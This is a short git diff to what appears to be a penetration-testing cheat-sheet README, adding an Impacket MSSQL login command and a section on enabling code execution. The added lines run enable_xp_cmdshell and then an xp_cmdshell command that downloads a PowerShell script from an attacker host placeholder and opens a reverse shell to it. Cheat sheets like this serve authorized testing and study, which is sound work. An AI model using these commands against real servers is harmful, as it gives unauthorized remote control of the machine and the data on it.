diff --git a/README.md b/README.md
index 7c6003c..efe7b55 100644
--- a/README.md
+++ b/README.md
@@ -594,8 +594,13 @@ nmap -v -p 139, 445 --script=smb-os-discovery {IP ADDRESS}
 # Impacket-mssqlclient
+impacket-mssqlclient {USERNAME}:'{PASSWORD}'@{IP ADDRESS}
 impacket-mssqlclient {USERNAME}:'{PASSWORD}'@{IP ADDRESS} -windows-auth
+# Enable Code Execution
+SQL> enable_xp_cmdshell
+SQL> EXEC xp_cmdshell 'echo IEX (New-Object Net.WebClient).DownloadString("http://{LHOST}/rev.ps1"); Invoke-PowerShellTcp -Reverse -IPAddress {LHOST} -Port {LPORT} | powershell -noprofile'
+
 # Note: Requires credentials
 # {IP ADDRESS}: IP Address of the Server
 # {USERNAME}: User Authentication